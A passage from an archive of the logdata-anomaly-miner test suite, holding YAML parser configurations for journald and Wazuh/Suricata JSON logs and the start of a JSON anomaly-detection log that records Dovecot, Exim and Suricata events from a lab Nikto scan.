'snapd.seeded.service' - 'cloud-config.service' - 'multi-user.target' - 'graphical.target' - 'cloud-final.service' - 'cloud-init.target' - 'user-1000.slice' - 'user@1000.service' - 'session-1.scope' - id: optional_key_INVOCATION_ID type: HexStringModelElement name: 'optional_key_INVOCATION_ID' - id: optional_key__STREAM_ID type: HexStringModelElement name: 'optional_key__STREAM_ID' - id: optional_key__AUDIT_TYPE type: DecimalIntegerValueModelElement name: 
'optional_key__AUDIT_TYPE' - id: optional_key__AUDIT_ID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_ID' - id: optional_key__AUDIT_FIELD_APPARMOR type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_APPARMOR' args: - '"STATUS"' - id: optional_key__AUDIT_FIELD_OPERATION type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_OPERATION' args: - '"profile_load"' - id: optional_key__AUDIT_FIELD_PROFILE type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_PROFILE' args: - '"unconfined"' - id: optional_key__AUDIT_FIELD_NAME type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_NAME' args: - 'lxc-container-default-cgns' - 'lxc-container-default-with-mounting' - 'lxc-container-default-with-nesting' - 'lxc-container-default' - '/usr/lib/NetworkManager/nm-dhcp-client.action' - '/usr/lib/NetworkManager/nm-dhcp-helper' - '/usr/lib/connman/scripts/dhclient-script' - '/usr/lib/snapd/snap-confine//mount-namespace-capture-helper' - '/usr/bin/lxc-start' - '/usr/bin/man' - '/usr/lib/snapd/snap-confine' - '/usr/sbin/tcpdump' - 'man_filter' - 'man_groff' - '/sbin/dhclient' - id: optional_key_ADDRESS type: IpAddressDataModelElement name: 'optional_key_ADDRESS' - id: optional_key_PREFIXLEN type: DecimalIntegerValueModelElement name: 'optional_key_PREFIXLEN' - id: optional_key_GATEWAY type: IpAddressDataModelElement name: 'optional_key_GATEWAY' - id: optional_key__AUDIT_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_SESSION' - id: optional_key__AUDIT_LOGINUID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_LOGINUID' - id: optional_key_SESSION_ID type: DecimalIntegerValueModelElement name: 'optional_key_SESSION_ID' - id: optional_key_USER_ID type: FixedWordlistDataModelElement name: 'optional_key_USER_ID' args: - 'ubuntu' - id: optional_key_LEADER type: DecimalIntegerValueModelElement name: 'optional_key_LEADER' - id: optional_key_KERNEL_USEC type: 
DecimalIntegerValueModelElement name: 'optional_key_KERNEL_USEC' - id: optional_key_USERSPACE_USEC type: DecimalIntegerValueModelElement name: 'optional_key_USERSPACE_USEC' - id: optional_key__SYSTEMD_OWNER_UID type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_OWNER_UID' - id: optional_key_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key_USER_UNIT' args: - 'gpg-agent-ssh.socket' - 'gpg-agent-browser.socket' - 'gpg-agent-extra.socket' - 'paths.target' - 'dirmngr.socket' - 'gpg-agent.socket' - 'sockets.target' - 'basic.target' - 'default.target' - 'timers.target' - id: optional_key_USER_INVOCATION_ID type: HexStringModelElement name: 'optional_key_USER_INVOCATION_ID' - id: optional_key__SYSTEMD_USER_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_SLICE' args: - '-.slice' - id: optional_key__SYSTEMD_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_UNIT' args: - 'init.scope' - 'cloud-config.service' - id: optional_key__SYSTEMD_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_SESSION' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: __CURSOR: __CURSOR __REALTIME_TIMESTAMP: __REALTIME_TIMESTAMP __MONOTONIC_TIMESTAMP: __MONOTONIC_TIMESTAMP _BOOT_ID: _BOOT_ID optional_key__SOURCE_MONOTONIC_TIMESTAMP: optional_key__SOURCE_MONOTONIC_TIMESTAMP _TRANSPORT: _TRANSPORT optional_key_PRIORITY: optional_key_PRIORITY optional_key__KERNEL_SUBSYSTEM: optional_key__KERNEL_SUBSYSTEM optional_key__KERNEL_DEVICE: optional_key__KERNEL_DEVICE optional_key__UDEV_DEVNODE: optional_key__UDEV_DEVNODE optional_key__UDEV_SYSNAME: optional_key__UDEV_SYSNAME SYSLOG_FACILITY: SYSLOG_FACILITY optional_key_CODE_FILE: optional_key_CODE_FILE optional_key_CODE_LINE: optional_key_CODE_LINE optional_key_CODE_FUNC: optional_key_CODE_FUNC optional_key_INTERFACE: optional_key_INTERFACE SYSLOG_IDENTIFIER: SYSLOG_IDENTIFIER optional_key_SYSLOG_PID: 
optional_key_SYSLOG_PID optional_key_MESSAGE_ID: optional_key_MESSAGE_ID optional_key_SEAT_ID: optional_key_SEAT_ID MESSAGE: MESSAGE optional_key__MACHINE_ID: optional_key__MACHINE_ID optional_key__HOSTNAME: optional_key__HOSTNAME optional_key__PID: optional_key__PID optional_key__UID: optional_key__UID optional_key__GID: optional_key__GID optional_key__COMM: optional_key__COMM optional_key__EXE: optional_key__EXE optional_key__CMDLINE: optional_key__CMDLINE optional_key__CAP_EFFECTIVE: optional_key__CAP_EFFECTIVE optional_key__SELINUX_CONTEXT: optional_key__SELINUX_CONTEXT optional_key__SYSTEMD_CGROUP: optional_key__SYSTEMD_CGROUP optional_key__SYSTEMD_UNIT: optional_key__SYSTEMD_UNIT optional_key__SYSTEMD_SLICE: optional_key__SYSTEMD_SLICE optional_key__SYSTEMD_INVOCATION_ID: optional_key__SYSTEMD_INVOCATION_ID optional_key_JOURNAL_NAME: optional_key_JOURNAL_NAME optional_key_JOURNAL_PATH: optional_key_JOURNAL_PATH optional_key_CURRENT_USE: optional_key_CURRENT_USE optional_key_CURRENT_USE_PRETTY: optional_key_CURRENT_USE_PRETTY optional_key_MAX_USE: optional_key_MAX_USE optional_key_MAX_USE_PRETTY: optional_key_MAX_USE_PRETTY optional_key_DISK_KEEP_FREE: optional_key_DISK_KEEP_FREE optional_key_DISK_KEEP_FREE_PRETTY: optional_key_DISK_KEEP_FREE_PRETTY optional_key_DISK_AVAILABLE: optional_key_DISK_AVAILABLE optional_key_DISK_AVAILABLE_PRETTY: optional_key_DISK_AVAILABLE_PRETTY optional_key_LIMIT: optional_key_LIMIT optional_key_LIMIT_PRETTY: optional_key_LIMIT_PRETTY optional_key_AVAILABLE: optional_key_AVAILABLE optional_key_AVAILABLE_PRETTY: optional_key_AVAILABLE_PRETTY optional_key__SOURCE_REALTIME_TIMESTAMP: optional_key__SOURCE_REALTIME_TIMESTAMP optional_key_JOB_TYPE: optional_key_JOB_TYPE optional_key_JOB_RESULT: optional_key_JOB_RESULT optional_key_UNIT: optional_key_UNIT optional_key_INVOCATION_ID: optional_key_INVOCATION_ID optional_key__STREAM_ID: optional_key__STREAM_ID optional_key__AUDIT_TYPE: optional_key__AUDIT_TYPE optional_key__AUDIT_ID: 
optional_key__AUDIT_ID optional_key__AUDIT_FIELD_APPARMOR: optional_key__AUDIT_FIELD_APPARMOR optional_key__AUDIT_FIELD_OPERATION: optional_key__AUDIT_FIELD_OPERATION optional_key__AUDIT_FIELD_PROFILE: optional_key__AUDIT_FIELD_PROFILE optional_key__AUDIT_FIELD_NAME: optional_key__AUDIT_FIELD_NAME optional_key_ADDRESS: optional_key_ADDRESS optional_key_PREFIXLEN: optional_key_PREFIXLEN optional_key_GATEWAY: optional_key_GATEWAY optional_key__AUDIT_SESSION: optional_key__AUDIT_SESSION optional_key__AUDIT_LOGINUID: optional_key__AUDIT_LOGINUID optional_key_SESSION_ID: optional_key_SESSION_ID optional_key_USER_ID: optional_key_USER_ID optional_key_LEADER: optional_key_LEADER optional_key_KERNEL_USEC: optional_key_KERNEL_USEC optional_key_USERSPACE_USEC: optional_key_USERSPACE_USEC optional_key__SYSTEMD_OWNER_UID: optional_key__SYSTEMD_OWNER_UID optional_key_USER_UNIT: optional_key_USER_UNIT optional_key_USER_INVOCATION_ID: optional_key_USER_INVOCATION_ID optional_key__SYSTEMD_USER_SLICE: optional_key__SYSTEMD_USER_SLICE optional_key__SYSTEMD_USER_UNIT: optional_key__SYSTEMD_USER_UNIT optional_key__SYSTEMD_SESSION: optional_key__SYSTEMD_SESSION Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-wazuh-demo.yml000066400000000000000000000172241500476301700314370ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/wazuh.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 
Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: level type: DecimalIntegerValueModelElement name: 'level' - id: description type: FixedWordlistDataModelElement name: 'description' args: - 'IDS event.' - 'Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character' - id: id type: DecimalIntegerValueModelElement name: 'id' value_pad_type: 'zero' - id: firedtimes type: DecimalIntegerValueModelElement name: 'firedtimes' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: groups type: FixedWordlistDataModelElement name: 'name' args: - 'ids' - 'suricata' - id: name type: FixedWordlistDataModelElement name: 'name' args: - 'user-0' - id: id_sec type: DateTimeModelElement name: 'id_sec' date_format: '%s.%f' - id: full_log type: AnyByteDataModelElement name: 'full_log' - id: predecoder_timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%d/%m/%Y-%H:%M:%S.%f' - id: _parent type: FixedWordlistDataModelElement name: '_parent' args: - 'snort' - id: decoder_name type: FixedWordlistDataModelElement name: 'name' args: - 'snort' - 'json' - id: _srcip type: IpAddressDataModelElement name: '_srcip' - id: dstip_ip type: IpAddressDataModelElement name: 'dstip_ip' - id: colon type: FixedDataModelElement name: 'colon' args: ':' - id: port type: DecimalIntegerValueModelElement name: 'port' - id: _dstip type: SequenceModelElement name: '_dstip' args: - dstip_ip - colon - port - id: data_id type: FixedWordlistDataModelElement name: 'data_id' args: - '1:2221030:1' - id: location type: FixedWordlistDataModelElement name: 'location' args: - '/var/log/forensic/suricata/fast.log' - '/var/log/forensic/suricata/eve.json' - id: _in_iface type: FixedWordlistDataModelElement name: '_in_iface' args: - 'eth0' - id: _event_type type: FixedWordlistDataModelElement name: '_event_type' args: - 'alert' - id: _src_ip type: IpAddressDataModelElement name: '_src_ip' 
- id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: IpAddressDataModelElement name: '_dest_ip' - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'TCP' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'SURICATA HTTP METHOD terminated by non-compliant character' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Generic Protocol Command Decode' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: hostname type: FixedWordlistDataModelElement name: 'hostname' args: - 'mail.cup.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&=+$,/?%#\~ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)' - id: http_content_type type: FixedWordlistDataModelElement name: 'http_content_type' args: - 'text/html' - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: status type: DecimalIntegerValueModelElement name: 'status' - id: length type: DecimalIntegerValueModelElement name: 'length' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp rule: level: level description: description id: id firedtimes: firedtimes mail: bool_wordlist groups: - groups agent: id: id name: name 
manager: name: name id: id_sec full_log: full_log _predecoder: timestamp: predecoder_timestamp decoder: _parent: _parent name: decoder_name data: _srcip: _srcip _dstip: _dstip _id: data_id _timestamp: timestamp _flow_id: id_sec _in_iface: _in_iface _event_type: _event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _tx_id: _tx_id _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _http: hostname: hostname url: url http_user_agent: http_user_agent http_content_type: http_content_type http_method: http_method protocol: protocol status: status length: length location: location Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/000077500000000000000000000000001500476301700276545ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/aminer.log000066400000000000000000045524701500476301700316530ustar00rootroot00000000000000{ "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(s) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str" ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", 
"/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, 
"/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 12, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Syslog disconnected user info", "Message": "New value combination(s) detected", "PersistenceFileName": "syslog_disconnected_user", "AffectedLogAtomPaths": [ "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user/user", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method/method", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured" ], "AffectedLogAtomValues": [ null, null, 3232238318, 3232238234, null ], "ParsedLogAtom": { "/parser/model": "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/time": 1583349453, "/parser/model/sp1": " ", "/parser/model/host": "mail", "/parser/model/service/dovecot": " dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, 
lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": 
"B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(s) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found", "/parser/model/fm/no_host_found/no_host_found_str", "/parser/model/fm/no_host_found/ip" ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 5, "AnalysisComponentType": "NewMatchPathValueDetector", "AnalysisComponentName": "Exim no host name found ip", "Message": "New value(s) detected", "PersistenceFileName": "exim_no_host_name_found_ip", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found/ip" ], "AffectedLogAtomValues": [ 3232238318 ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", 
"/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80", "/parser/model/time": 1583349513.887668, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46762, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 
192.168.10.154:80" ], "Timestamps": [ 1583349513.89 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80", "/parser/model/time": 1583349514.13232, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46764, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.13256, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", 
